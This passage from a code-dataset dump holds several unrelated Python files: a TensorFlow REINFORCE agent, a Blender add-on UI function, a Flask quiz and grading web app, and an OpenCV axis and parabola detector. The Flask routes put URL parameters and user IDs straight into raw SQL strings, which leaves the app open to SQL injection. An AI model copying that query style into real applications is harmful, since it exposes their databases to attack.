self.avg_loss.result()\n\n    def reset_metrics_loss(self):\n        self.avg_loss.reset_states()\n\n    def select_action(self, state):\n        # Assume using Epsilon 
Greedy Strategy\n        action = self.exploration_strategy.select_action()\n        # If the index of action (return value) is -1, choose the action with highest probability that model predict\n        if action == -1 or self.is_shutdown_explore:\n            # Predict the probability of each action(Stochastic Policy)\n            predict = self.predict([state])\n            # Pick the action with HIGHEST probability\n            return tf.argmax(predict, axis = 1)[0]\n        else:\n            # If the index of action (return value) is != -1, act randomly \n            return action\n\n    def shutdown_explore(self):\n        self.is_shutdown_explore = True\n    \n    def update(self):\n        with tf.GradientTape() as tape:\n            sample_states, sample_actions, sample_rewards, sample_state_primes = self.sample()\n            loss = self.loss(sample_states, sample_actions, sample_rewards, sample_state_primes)\n            # print(\"Loss: {}\".format(loss))\n            # Update gradient\n            gradients = tape.gradient(loss, self.model.trainable_variables)\n            self.optimizer.apply_gradients(zip(gradients, self.model.trainable_variables))\n            self.avg_loss.update_state(loss)\n\n        # Update exploration rate of Epsilon Greedy Strategy\n        self.exploration_strategy.update_epsilon()\n\n        self.iter += 1\n\n        return loss\n\n    def reset_buffer(self):\n        # Init & Reset buffer\n        # The buffer is used for Historical Replay / Trajectory Storing etc...\n        self.buffer = {'state': [], 'action': [], 'reward': [], 'state_prime': []}\n\n    def add_buffer(self, new_state, new_action, new_reward, new_state_prime):\n        self.buffer['state'].append(new_state)\n        self.buffer['action'].append(new_action)\n        self.buffer['reward'].append(new_reward)\n        self.buffer['state_prime'].append(new_state_prime)\n    \n    def sample(self):\n        # Return whole trajectory\n        return self.buffer['state'], self.buffer['action'], self.buffer['reward'], self.buffer['state_prime']","repo_name":"FrankCCCCC/rl_collection","sub_path":"models/REINFORCE.py","file_name":"REINFORCE.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20478882427","text":"import bpy\n\n# RobotDesigner imports\nfrom .model import check_armature\nfrom ..core import PluginManager\nfrom ..core.gui import InfoBox\nfrom ..properties.globals import global_properties\n\ndef draw(layout, context):\n    \"\"\"\n    Draws the user interface for file operations (i.e., import/export)\n\n    :param layout: Current GUI element (e.g., collapsible box, row, etc.)\n    :param context: Blender context\n    \"\"\"\n    layout = layout.box()\n    layout.label('Import/Export')\n\n    # # Will be added again once GIT persistence has been decided on\n    #\n    # global_properties.storage_mode.prop(context.scene,layout, expand=True)\n    # storage_mode = global_properties.storage_mode.get(context.scene)\n    #\n    # if storage_mode == 'local':\n    #     pass\n    # elif storage_mode == 'git':\n    #     global_properties.git_repository.prop(context.scene, layout)\n    #     global_properties.git_url.prop(context.scene, layout)\n    # elif storage_mode == 'temporary':\n    #     global_properties.git_url.prop(context.scene, layout)\n\n    row = layout.row()\n    column = row.column()\n\n    for plugin in PluginManager.getFilePlugins(PluginManager.PluginTypes.FILE):\n        label, operators, draw_function, _ = plugin\n\n        box = column.box()\n        row2 =box.row(align=True)\n        infoBox = InfoBox(row2)\n        column2 = row2.column(align=True)\n        column2.label(text=label)\n        column2 = row2.column(align=True)\n        if not draw_function:\n            for operator in operators:\n                operator.place_button(layout=column2, infoBox=infoBox)\n        row2=box.row(align=True)\n        
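A hypothetical driver loop for the Agent above, assuming a gym-style environment whose step() returns a 4-tuple (env and its API are not part of this file):

def run_episode(env, agent):
    # Collect one full trajectory, then take a single policy-gradient step,
    # matching the per-trajectory update noted in Agent.loss().
    state = env.reset()
    agent.reset_buffer()
    done = False
    while not done:
        action = int(agent.select_action(state))
        state_prime, reward, done, _ = env.step(action)
        agent.add_buffer(state, action, reward, state_prime)
        state = state_prime
    return agent.update()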
infoBox.draw_info()\n\n","repo_name":"higain/BlenderRobotDesigner","sub_path":"robot_designer_plugin/interface/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"32901149274","text":"import collections\nimport json\nimport os\nimport uuid\nimport shutil\nimport subprocess\nimport re\nfrom flask import Blueprint, flash, redirect, request, url_for, render_template\nfrom flask import Markup\nfrom models.all_models import *\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_login import login_user, login_required, logout_user, current_user\n\nbp = Blueprint('dnapi', __name__, url_prefix='/')\n\nWORKFLOW_URL = \" https://usegalaxy.eu/training-material/topics/assembly/tutorials/general-introduction/workflows/assembly-general-introduction.ga\"\n\n@bp.route('/login', methods=['GET', 'POST'])\ndef login():\n    \"\"\"\n    Function to log in the user\n    @return: index page if login is successful, else return to login page with message\n    @rtype: flask template\n    \"\"\"\n    if request.method == 'POST':\n        username = request.form.get('username')\n        password = request.form.get('password')\n        user = Users.query.filter_by(username=username).first()\n        if user and check_password_hash(user.password, password):\n            login_user(user, remember=True)\n            return redirect(url_for('index'))\n        else:\n            flash('Wrong username or password', category='warning')\n    return render_template(\"login.html\")\n\n\n@bp.route('/register', methods=['GET', 'POST'])\ndef register():\n    \"\"\"\n    Function to register the user\n    @return: return to the register page with success or error message\n    @rtype: flask template\n    \"\"\"\n    if request.method == 'POST':\n        username = request.form.get('username')\n        password = request.form.get('password')\n        repeat_password = request.form.get('repeat_password')\n        user = Users.query.filter_by(username=username).first()\n        if user:\n            flash('username already exists', category='warning')\n        elif len(username) < 3 or len(username) > 20:\n            flash('username must be of length 3-20 characters', category='warning')\n        elif len(password) < 3 or len(password) > 20:\n            flash('password must be of length 3-20 characters', category='warning')\n        elif password != repeat_password:\n            flash('Passwords are not identical', category='warning')\n        else:\n            new_user = Users(username=username, password=generate_password_hash(password, method='sha256'))\n            db.session.add(new_user)\n            db.session.commit()\n            flash('Account created', category='success')\n            return redirect(url_for('dnapi.login'))\n    # if request.method == 'GET':\n    return render_template(\"register.html\")\n\n\n@bp.route('/logout')\n@login_required\ndef logout():\n    \"\"\"\n    Log out the user\n    @return: return to the login page\n    @rtype: flask template redirect\n    \"\"\"\n    logout_user()\n    flash('Logged out successfully', category='success')\n    return redirect(url_for('dnapi.login'))\n\n\n@bp.route('/level/<level_id>/intro')\ndef intro(level_id):\n    \"\"\"\n    Function for accessing each level's introduction page\n    @param level_id: id of level\n    @type level_id: integer in string form\n    @return: return the certain introduction page\n    @rtype: flask template\n    \"\"\"\n    return render_template(\"games/level%s/intro.html\" % level_id, cur_lvl_intro=int(level_id))\n\n\n@bp.route('/level/<level_id>/chapter/<chapter_id>')\ndef chapter(level_id, chapter_id):\n    \"\"\"\n    view function for quiz page\n    @param level_id: the level id for showing related quiz questions\n    @type level_id: 
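The login/register pair above uses the standard werkzeug hash round trip; a self-contained illustration (the 'sha256' method name matches the older werkzeug releases this code targets and is dropped in newer ones):

from werkzeug.security import generate_password_hash, check_password_hash

stored = generate_password_hash("s3cret", method="sha256")  # never store the plain text
assert check_password_hash(stored, "s3cret")
assert not check_password_hash(stored, "wrong")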
integer\n @param chapter_id: the chapter id for showing related quiz questions\n @type chapter_id: integer\n @return: flask template for quiz\n @rtype: flask template\n \"\"\"\n if level_id == \"3\" and chapter_id == \"4\":\n if current_user.is_authenticated:\n return redirect(url_for('dnapi.paper_writing', ifFinished=False))\n else:\n return redirect(url_for('dnapi.login'))\n\n cur_chapter = Chapter.query.filter_by(level_id=int(level_id), order_id=int(chapter_id)).first()\n chapter_dump, questions_dump = quiz_questions_helper(cur_chapter.id)\n\n return render_template(\"games/chapter.html\", questions=questions_dump, chapter=chapter_dump)\n\n\ndef delete_previous_result(chapter_id):\n \"\"\"\n function deleting previous results with given chapter_id and logged_in user\n @param chapter_id: the chapter id for showing related quiz questions\n @type chapter_id: integer\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n if current_user.is_authenticated:\n db.engine.execute(\n \"delete from answer where answer.choice_id in ( select answer.choice_id from answer, choice, chapter, users, question where answer.choice_id = choice.id and choice.question_id = question.id and question.chapter_id = chapter.id and chapter.id = %s and users.id = %s )\" % (\n chapter_id, current_user.id))\n db.engine.execute(\n \"delete from open_answer where open_answer.id in ( select open_answer.id from open_answer, question where open_answer.question_id = question.id and question.chapter_id = %s and open_answer.user_id = %s )\" % (\n chapter_id, current_user.id))\n db.engine.execute(\"delete from score where chapter_id = %s and user_id=%s\" % (chapter_id, current_user.id))\n\n\ndef store_quiz_results(chapter_id, form):\n \"\"\"\n function for storing quiz results\n @param chapter_id: the chapter id for showing related quiz questions\n @type chapter_id: integer\n @param form: user submitted form\n @type form: dict\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n chapter_dump, questions_dump = quiz_questions_helper(chapter_id)\n cur_score = 0\n\n # delete old results if the user is authenticated\n delete_previous_result(chapter_id)\n\n # check score for each question\n i = 0\n while i < len(questions_dump):\n j = i\n if questions_dump[i]['type'] in ['choose_one', 'grid', 'choose_many', 'grid_checkbox']:\n submitted_answers = set(form.getlist(questions_dump[i]['id']))\n # if the user is_authenticated, update answer to the database for each choice selected\n if current_user.is_authenticated:\n for aws_id in submitted_answers:\n new_answer = Answer(\n user_id=current_user.id,\n choice_id=aws_id\n )\n db.session.add(new_answer)\n db.session.commit()\n elif questions_dump[i]['type'] in ['open']:\n submitted_answer = form[questions_dump[i]['id']]\n # if the user is_authenticated, update answer to the database for each choice selected\n if not submitted_answer:\n questions_dump[i]['missed'] = True\n else:\n questions_dump[i]['score'] = questions_dump[i]['point']\n questions_dump[i]['ans'] = submitted_answer\n cur_score += questions_dump[i]['point']\n if current_user.is_authenticated:\n new_answer = OpenAnswer(\n user_id=current_user.id,\n answer=submitted_answer,\n question_id=questions_dump[i]['id'],\n )\n db.session.add(new_answer)\n db.session.commit()\n # start counting selected correct choices and wrong choices that user didn't select\n selected_correct = 0\n missed_wrong = 0\n if questions_dump[i]['type'] in ['choose_one', 'grid']:\n if not 
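delete_previous_result() above interpolates IDs into raw SQL with %; that is workable here because both values are server-side integers, but placeholder parameters are the safer general idiom. A runnable sqlite3 sketch of the same delete (hypothetical table, not this app's engine):

import sqlite3

con = sqlite3.connect(":memory:")
con.execute("create table score (chapter_id int, user_id int, score int)")
con.execute("insert into score values (1, 7, 90)")
# The driver quotes the values itself, so no string interpolation is needed.
con.execute("delete from score where chapter_id = ? and user_id = ?", (1, 7))
assert con.execute("select count(*) from score").fetchone()[0] == 0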
form.get(questions_dump[i]['id']):\n                questions_dump[i]['missed'] = True\n            for choice in questions_dump[i]['choices']:\n                if choice['correctness']:\n                    if choice['id'] in submitted_answers:\n                        choice['state'] = 'correct'\n                        selected_correct += 1\n                    else:\n                        choice['state'] = 'missed'\n                else:\n                    if choice['id'] in submitted_answers:\n                        choice['state'] = 'wrong'\n                    else:\n                        missed_wrong += 1\n            if selected_correct > 0:\n                questions_dump[i]['score'] = questions_dump[i]['point']\n                cur_score += questions_dump[i]['point']\n            else:\n                questions_dump[i]['score'] = 0\n        elif questions_dump[i]['type'] in ['choose_many', 'grid_checkbox']:\n            total_choice_num = 0\n            while j < len(questions_dump):\n                if questions_dump[j]['title'] != questions_dump[i]['title']:\n                    break\n                if not form.get(questions_dump[j]['id']):\n                    questions_dump[j]['missed'] = True\n                for choice in questions_dump[j]['choices']:\n                    total_choice_num += 1\n                    if choice['correctness']:\n                        if choice['id'] in submitted_answers:\n                            choice['state'] = 'correct'\n                            selected_correct += 1\n                        else:\n                            choice['state'] = 'missed'\n                    else:\n                        if choice['id'] in submitted_answers:\n                            choice['state'] = 'wrong'\n                        else:\n                            missed_wrong += 1\n                j += 1\n            correct_sum = selected_correct + missed_wrong\n            question_score = 0\n            if correct_sum == 0:\n                question_score = 0\n            else:\n                question_score = round(correct_sum / total_choice_num * questions_dump[i]['point'])\n            cur_score += question_score\n            for k in range(i, j):\n                questions_dump[k]['score'] = question_score\n            i = j - 1\n        else:\n            pass\n        i += 1\n\n    # if the user is authenticated, update final score to the database\n    if current_user.is_authenticated:\n        new_score = Score(\n            score=cur_score,\n            user_id=current_user.id,\n            chapter_id=chapter_id\n        )\n        db.session.add(new_score)\n        db.session.commit()\n\n    ranking = get_ranking(chapter_id)\n    return questions_dump, chapter_dump, cur_score, ranking\n\n\n@bp.route('/quiz/<chapter_id>/submit', methods=['POST'])\ndef quiz_submit(chapter_id):\n    \"\"\"\n    function for receiving quiz answers, checking them, store the score and return to the result page\n    @param chapter_id: the chapter id for showing related quiz questions\n    @type chapter_id: integer\n    @return: return the quiz result page\n    @rtype: flask template\n    \"\"\"\n\n    questions_dump, chapter_dump, cur_score, ranking = store_quiz_results(chapter_id, request.form)\n\n    return render_template(\"games/quiz_result.html\", questions=questions_dump, cur_lvl=chapter_dump['level_id'],\n                           chapter=chapter_dump, score=cur_score, ranking=ranking)\n\n\ndef left_chapter_menu_helper():\n    \"\"\"\n    helper function to return a lvl->chapter dictionary for the chapter menu\n    @return: a lvl->chapter dictionary\n    @rtype: dictionary\n    \"\"\"\n    levels = Level.query.all()\n    levels = levels_schema.dump(levels)\n    level_dict = {}\n    for lvl in levels:\n        if lvl['chapters']:\n            level_dict[lvl['id']] = []\n            for ch in lvl['chapters']:\n                chapter = Chapter.query.get(ch)\n                chapter = chapter_schema.dump(chapter)\n                level_dict[lvl['id']].append(chapter)\n\n    if current_user.is_authenticated:\n        done_chapters = db.engine.execute('select chapter_id from score where user_id = %s' % (current_user.id))\n        done_chapters_list = [row[0] for row in done_chapters]\n        if done_chapters_list:\n            for chapters in level_dict.values():\n                for ch in chapters:\n                    if ch['id'] in done_chapters_list:\n                        ch['done'] = 1\n    return level_dict\n\n\ndef quiz_questions_helper(chapter_id):\n    \"\"\"\n    function to get a chapter object and a list of questions of the particular chapter by chapter id\n    @param chapter_id: id of the chapter\n    @type 
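The grid_checkbox branch above awards partial credit: points scale with the number of choices handled correctly (correct picks plus wrong options left unselected). A compact check of that arithmetic with hypothetical numbers:

def partial_credit(selected_correct, missed_wrong, total_choices, point):
    correct_sum = selected_correct + missed_wrong
    if correct_sum == 0:
        return 0
    return round(correct_sum / total_choices * point)

assert partial_credit(2, 1, 4, 8) == 6   # 3 of 4 choices right -> 6 of 8 points
assert partial_credit(0, 0, 4, 8) == 0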
chapter_id: integer\n    @return: a chapter object and a list of questions of the particular chapter\n    @rtype: chapter object and list\n    \"\"\"\n    questions = Question.query.filter_by(chapter_id=chapter_id).order_by(Question.id).all()\n    questions_dump = questionswithanswers_schema.dump(questions)\n    cur_chapter = Chapter.query.get(chapter_id)\n    chapter_dump = chapter_schema.dump(cur_chapter)\n    return chapter_dump, questions_dump\n\n\ndef handle_addtime(result_raw):\n    \"\"\"\n    make raw sql result to list of dictionaries and remove microseconds from addtime field\n    @param result_raw: raw sql result\n    @type result_raw: raw sql result\n    @return: sql result in the form of a list of dictionary\n    @rtype: a list of dictionary\n    \"\"\"\n    result = [dict(row) for row in result_raw]\n    for c in result:\n        if c['add_time']:\n            c['add_time'] = c['add_time'].replace(microsecond=0)\n    return result\n\n\n@bp.route('/progress')\n@login_required\ndef progress():\n    \"\"\"\n    view function for progress page\n    @return: return the progress page\n    @rtype: flask template\n    \"\"\"\n    # get raw query result\n    chapters_raw = db.engine.execute(\n        'select chapter.id, order_id, name, score, add_time, level_id from chapter left join score on score.chapter_id = chapter.id and score.user_id = %s order by chapter.id' % (current_user.id))\n\n    # process time format and make the result a dictionary\n    chapters_processed = handle_addtime(chapters_raw)\n\n    # convert it into a lvl_id:[chapters] dictionary\n    chapter_lvl_dict = {}\n    for c in chapters_processed:\n        if c['level_id'] not in chapter_lvl_dict:\n            chapter_lvl_dict[c['level_id']] = []\n        chapter_lvl_dict[c['level_id']].append(c)\n\n    # sort it by the lvl id\n    sorted_dict = collections.OrderedDict(sorted(chapter_lvl_dict.items()))\n\n    return render_template(\"progress.html\", lvl_dict=sorted_dict)\n\n\ndef get_ranking(chapter_id):\n    \"\"\"\n    function to return top 5 result for certain chapter\n    @param chapter_id: id of the chapter\n    @type chapter_id: integer\n    @return: a list of ranking\n    @rtype: list\n    \"\"\"\n    ranking_raw = db.engine.execute(\n        'select username, score, add_time, user_id from score, users where score.user_id = users.id and score.chapter_id = %s order by score DESC, add_time ASC limit 5' % (\n            chapter_id))\n    ranking = handle_addtime(ranking_raw)\n    return ranking\n\n\n@bp.route('/level/<level_id>/chapter/<chapter_id>/result')\n@login_required\ndef chapter_result(level_id, chapter_id):\n    \"\"\"\n    function for receiving quiz answers\n    @param level_id: the level id of the chapter\n    @type level_id: integer\n    @param chapter_id: the chapter id for showing related quiz result\n    @type chapter_id: integer\n    @return: return result page\n    @rtype: flask template\n    \"\"\"\n    if level_id == \"3\" and chapter_id == \"4\":\n        return redirect(url_for('dnapi.paper_writing', ifFinished=True))\n    cur_chapter_raw = db.engine.execute(\n        'select * from chapter where level_id = %s and order_id = %s' % (level_id, chapter_id))\n    cur_chapter = [dict(row) for row in cur_chapter_raw]\n    chapter_dump, questions_dump = quiz_questions_helper(cur_chapter[0]['id'])\n    selected_choices_raw = db.engine.execute(\n        \"select question.id as q_id, choice.id as c_id from answer, chapter, choice, question where choice.question_id = question.id and question.chapter_id = chapter.id and choice.id = answer.choice_id and user_id = %s and chapter.id = %s order by question.id, choice.id\" % (\n            current_user.id, cur_chapter[0]['id']))\n    ranking = get_ranking(cur_chapter[0]['id'])\n\n\n    if level_id == \"2\" and chapter_id == \"3\" and 
current_user.is_authenticated:\n history_link = GalaxyHistoryLinks.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter[0]['id']).first()\n return render_template(\"games/chapter.html\", questions=questions_dump, chapter=chapter_dump, history_link=history_link)\n\n open_anwser_raw = db.engine.execute(\n 'select question.id as q_id, answer as ans from open_answer, question, chapter where question.chapter_id = chapter.id and question.id = open_answer.question_id and user_id = %s and chapter.id = %s' % (current_user.id, cur_chapter[0]['id']))\n open_anwers = [dict(row) for row in open_anwser_raw]\n\n\n selected_choices = {}\n for row in selected_choices_raw:\n if str(row[0]) not in selected_choices:\n selected_choices[str(row[0])] = []\n selected_choices[str(row[0])].append(str(row[1]))\n\n score = Score.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter[0]['id']).first()\n\n for question in questions_dump:\n if question['type'] in ['choose_one', 'grid', 'choose_many', 'grid_checkbox']:\n if question['id'] not in selected_choices:\n question['missed'] = True\n for choice in question['choices']:\n if choice['correctness']:\n if question['id'] in selected_choices and choice['id'] in selected_choices[question['id']]:\n choice['state'] = 'correct'\n else:\n choice['state'] = 'missed'\n else:\n if question['id'] in selected_choices and choice['id'] in selected_choices[question['id']]:\n choice['state'] = 'wrong'\n elif question['type'] in ['open']:\n for oa in open_anwers:\n if str(oa['q_id']) == str(question['id']):\n question['ans'] = oa['ans']\n\n return render_template(\"games/quiz_result.html\", questions=questions_dump, cur_lvl=level_id,\n chapter=chapter_dump, score=score.score, ranking=ranking)\n\n\n@bp.route('/galaxy_history', methods=['POST'])\ndef galaxy_history():\n \"\"\"\n view function for galaxy history result\n @return: return galaxy history result page\n @rtype: flask template\n \"\"\"\n\n # Check if the Galaxy API KEY is set correctly\n if 'GALAXY_API_KEY' in os.environ:\n api_key = os.environ['GALAXY_API_KEY']\n else:\n flash(Markup(\n 'The Galaxy API KEY is not set correctly. Please contact the developer'), category='warning')\n return redirect(request.referrer)\n history_url = request.form.get('history_url')\n TMP_DIR = '/tmp/dnapi'\n folder_name = str(uuid.uuid4())\n output_path = os.path.join(TMP_DIR, folder_name)\n output_report_path = os.path.join(output_path, 'report.json')\n\n # check if the submitted galaxy history url is valid\n pattern = r'^https://usegalaxy\\.eu/u/.+/h/.+$'\n if not re.match(pattern, history_url):\n flash(Markup('Invalid Galaxy history url, It should follow the pattern: https://usegalaxy.eu/u/.../h/...
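A quick check of the history-URL pattern used by galaxy_history() above (sample URLs are made up):

import re

pattern = r'^https://usegalaxy\.eu/u/.+/h/.+$'
assert re.match(pattern, 'https://usegalaxy.eu/u/alice/h/assembly-run')
assert not re.match(pattern, 'https://usegalaxy.eu/u/alice')        # no /h/ part
assert not re.match(pattern, 'http://usegalaxy.eu/u/alice/h/run')   # wrong scheme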
Learn how to share history HERE .'), category='warning')\n return redirect(request.referrer)\n\n # execute the ghevaluator command\n command = f\"ghevaluator -u {history_url} -w {WORKFLOW_URL} -a {api_key} -o {output_path}\"\n print(f\"Executing command: {command}\")\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n print(output)\n print(error)\n\n # read the output report json file\n with open(output_report_path) as test_file:\n json_result = json.load(test_file)\n chapter = Chapter.query.get(8)\n\n # calculate score based on tools used\n num_of_tools = 0 # total number of tools\n score = 0 # user score\n for tool, tool_res in json_result['comparison_by_reference_workflow_tools'].items():\n for step_num, step_res in tool_res['details'].items():\n num_of_tools += 1\n # check if using the same tool\n if step_res['id'] and step_res['id']['same']:\n score += 5\n # if using the same tool, then check tool version\n if step_res['version'] and step_res['version']['same']:\n score += 1\n # if using the same tool, then check parameters\n if step_res['parameters'] and step_res['parameters']['wrong'] and step_res['parameters']['number'] and \\\n step_res['parameters']['number']['workflow']:\n percentage_of_correct_params = (step_res['parameters']['number']['workflow'] - step_res['parameters']['wrong']) / step_res['parameters']['number']['workflow']\n score += (max(percentage_of_correct_params, 0)) * 2\n normalized_score = round(score / (num_of_tools * 8) * 100, 2)\n\n # remove move the tmp folder\n shutil.rmtree(output_path)\n\n # if the user is authenticated, update final score to the database\n if current_user.is_authenticated:\n\n cur_chapter = Chapter.query.filter_by(level_id=2, order_id=3).first()\n old_score = Score.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter.id).first()\n old_history_link = GalaxyHistoryLinks.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter.id).first()\n\n if not old_history_link or old_history_link.url != history_url:\n new_history = GalaxyHistoryLinks(\n user_id=current_user.id,\n chapter_id=cur_chapter.id,\n url=history_url\n )\n db.session.add(new_history)\n db.session.commit()\n\n if not old_score or old_score.score != normalized_score:\n new_score = Score(\n score=normalized_score,\n user_id=current_user.id,\n chapter_id=cur_chapter.id\n )\n db.session.add(new_score)\n db.session.commit()\n\n return render_template(\"games/level2/galaxy_result.html\", result=json_result, chapter=chapter,\n score=normalized_score)\n\n\n@bp.context_processor\ndef provide_menu():\n \"\"\"\n function to provide global variable for all the templates to use\n @return: a dictionary for level->[chapters]\n @rtype: dictionary\n \"\"\"\n level_dict = left_chapter_menu_helper()\n return {'level_dict': level_dict}\n\n\ndef open_question_handler(form_data, chapter_id):\n \"\"\"\n function for receiving paper answers, store the answers & scores and return to the result page\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n open_questions = {}\n left_data = {}\n for key, value in form_data.items():\n if key.startswith('open'):\n open_questions[key] = value\n q_key = key[4:]\n if q_key in form_data:\n open_questions[q_key] = form_data[q_key]\n\n for key, value in form_data.items():\n if key not in open_questions:\n left_data[key] = value\n\n questions = Question.query.filter_by(chapter_id=chapter_id, type=\"open\").order_by(Question.id).all()\n # questions_dump = 
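Each workflow step above can earn at most 5 (tool id) + 1 (version) + 2 (parameters) = 8 points, which is why the score is normalized by num_of_tools * 8. A worked example with hypothetical counts:

num_of_tools = 10                # steps in the reference workflow
score = 8 * 5 + 6 * 1 + 7 * 2    # e.g. 8 tool matches, 6 version matches, full parameters on 7
normalized_score = round(score / (num_of_tools * 8) * 100, 2)
assert normalized_score == 75.0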
questionswithanswers_schema.dump(questions)\n # cur_chapter = Chapter.query.get(chapter_id)\n # chapter_dump = chapter_schema.dump(cur_chapter)\n #\n # if current_user.is_authenticated:\n # for aws_id in submitted_answers:\n # new_answer = Answer(\n # user_id=current_user.id,\n # choice_id=aws_id\n # )\n # db.session.add(new_answer)\n # db.session.commit()\n #\n # # if the user is authenticated, update final score to the database\n # if current_user.is_authenticated:\n # new_score = Score(\n # score=cur_score,\n # user_id=current_user.id,\n # chapter_id=chapter_id\n # )\n # db.session.add(new_score)\n # db.session.commit()\n return left_data\n\n\n@bp.route('/paper_writing')\ndef paper_writing():\n \"\"\"\n view function for paper writing page, getting value from previous chapters and showing them here.\n @return: return paper writing page\n @rtype: flask template\n \"\"\"\n ifFinished = request.args.get(\"ifFinished\")\n chapter = Chapter.query.filter_by(level_id=3, order_id=4).first()\n chapter_dump, questions_dump = quiz_questions_helper(chapter.id)\n if ifFinished == \"False\":\n introduction = 'Kombucha, a fermented beverage with roots tracing back over 2000 years to China, ' \\\n 'has gained worldwide popularity due to its purported health benefits (Jayabalan, ' \\\n 'Malbaša, Lončar, Vitas, & Sathishkumar, 2014). Over the years, extensive research ' \\\n 'has been conducted to understand its biochemical properties, microbiology, toxicity, ' \\\n 'cellulose production, and fermentation dynamics (Greenwalt, Steinkraus, & Ledford, 2000; ' \\\n 'Jayabalan et al., 2014; Rosma, Karim, & Bhat, 2012; Sreeramulu, Zhu, & Knol, 2000). ' \\\n 'The microbial diversity of Kombucha has been extensively studied using culture-based methods ' \\\n 'and sequencing of phylogenetic marker genes (Chakravorty et al., 2016; Coton et al., 2017; ' \\\n 'De Filippis, Troise, Vitaglione, & Ercolini, 2018; Marsh, O\\'Sullivan, Hill, Ross, & Cotter, 2014; ' \\\n 'Reva et al., 2015). To build upon these findings, our study will leverage the Galaxy bioinformatics ' \\\n 'platform, a powerful, user-friendly, and open-source tool for the analysis and interpretation of ' \\\n 'genomic data. Our objective is to reanalyze the metagenomic data from two Turkish Kombucha samples, ' \\\n 'harvested at different stages of the fermentation process. We will employ WMS sequencing and ' \\\n 'NGS-based amplicon sequencing (16S rRNA gene and Internal Transcribed Spacer 1 [ITS1]) to derive ' \\\n 'detailed taxonomic and functional characteristics of the Kombucha samples. Through the Galaxy ' \\\n 'platform\\'s robust suite of tools for genomic analysis, we aim to reaffirm the findings of the ' \\\n 'original study and potentially uncover additional insights into the microbial composition and ' \\\n 'functional dynamics of Kombucha. 
Our work illustrates the potent synergy of traditional microbiological ' \\\n 'studies and modern bioinformatics, paving the way for future explorations in this fascinating field.'\n results_answers_raw = db.engine.execute(\n 'select question.transition_sentence as ts, answer as ans from open_answer, question where question.id = open_answer.question_id and user_id = %s and question.chapter_id = %s' % (\n current_user.id, chapter.id-1))\n results_answers = [dict(row) for row in results_answers_raw]\n results = \"\"\n for r in results_answers:\n results = results + r['ts'] + \" \"\n results = results + r['ans'] + \" \"\n methods_answers_raw = db.engine.execute(\n 'select question.transition_sentence as ts, answer as ans from open_answer, question where question.id = open_answer.question_id and user_id = %s and question.chapter_id = %s' % (\n current_user.id, chapter.id-2))\n methods_answers = [dict(row) for row in methods_answers_raw]\n methods = \"\"\n for r in methods_answers:\n methods = methods + r['ts'] + \" \"\n methods = methods + r['ans'] + \" \"\n print(questions_dump)\n return render_template(\"games/level3/paper_writing.html\", chapter=chapter_dump, questions=questions_dump,\n methods=methods, results=results, introduction=introduction)\n else:\n open_anwser_raw = db.engine.execute(\n 'select question.id as q_id, answer as ans from open_answer, question, chapter where question.chapter_id = chapter.id and question.id = open_answer.question_id and user_id = %s and chapter.id = %s' % (\n current_user.id, chapter.id))\n open_anwers = [dict(row) for row in open_anwser_raw]\n for question in questions_dump:\n for oa in open_anwers:\n if str(oa['q_id']) == str(question['id']):\n question['ans'] = oa['ans']\n return render_template(\"games/level3/paper_writing.html\", chapter=chapter_dump, questions=questions_dump)\n\n\n@bp.route('/paper_writing/submit', methods=['POST'])\n@login_required\ndef paper_writing_submit():\n \"\"\"\n function for handling level 3 chapter 4 paper writing\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n store_quiz_results(12, request.form)\n return redirect(url_for('dnapi.paper_writing', ifFinished=True))\n\n","repo_name":"StreetScienceCommunity/DNAnalyzer","sub_path":"routes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28855,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"17004257940","text":"from parabola import *\nfrom axis import *\n\nimport cv2\nimport numpy as np\nimport math\nimport argparse\n\nnp.warnings.filterwarnings('ignore')\n\n\ndef detect_axis_and_parabola(image_name):\n image = cv2.imread(image_name)\n image, edge_map_image, angle_rotation = find_and_draw_axis(image)\n find_and_draw_parabola(image,edge_map_image, angle_rotation)\n cv2.imshow(image_name, image)\n\n\n# main()\nif __name__ == '__main__' :\n\n parser = argparse.ArgumentParser(description='Receive image')\n parser.add_argument('-i', '--img', required=True, type=str, help='Input image path')\n args = parser.parse_args()\n detect_axis_and_parabola(args.img)\n\n key = cv2.waitKey(0)\n if key == 27: # wait for ESC\n print('Key ESC pressed.')\n cv2.destroyAllWindows()\n","repo_name":"thiagodalmoro/INF_UFRGS-Vision","sub_path":"Trab2_Vision/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5101040223","text":"import sys\nimport os\nimport random\n\n# 
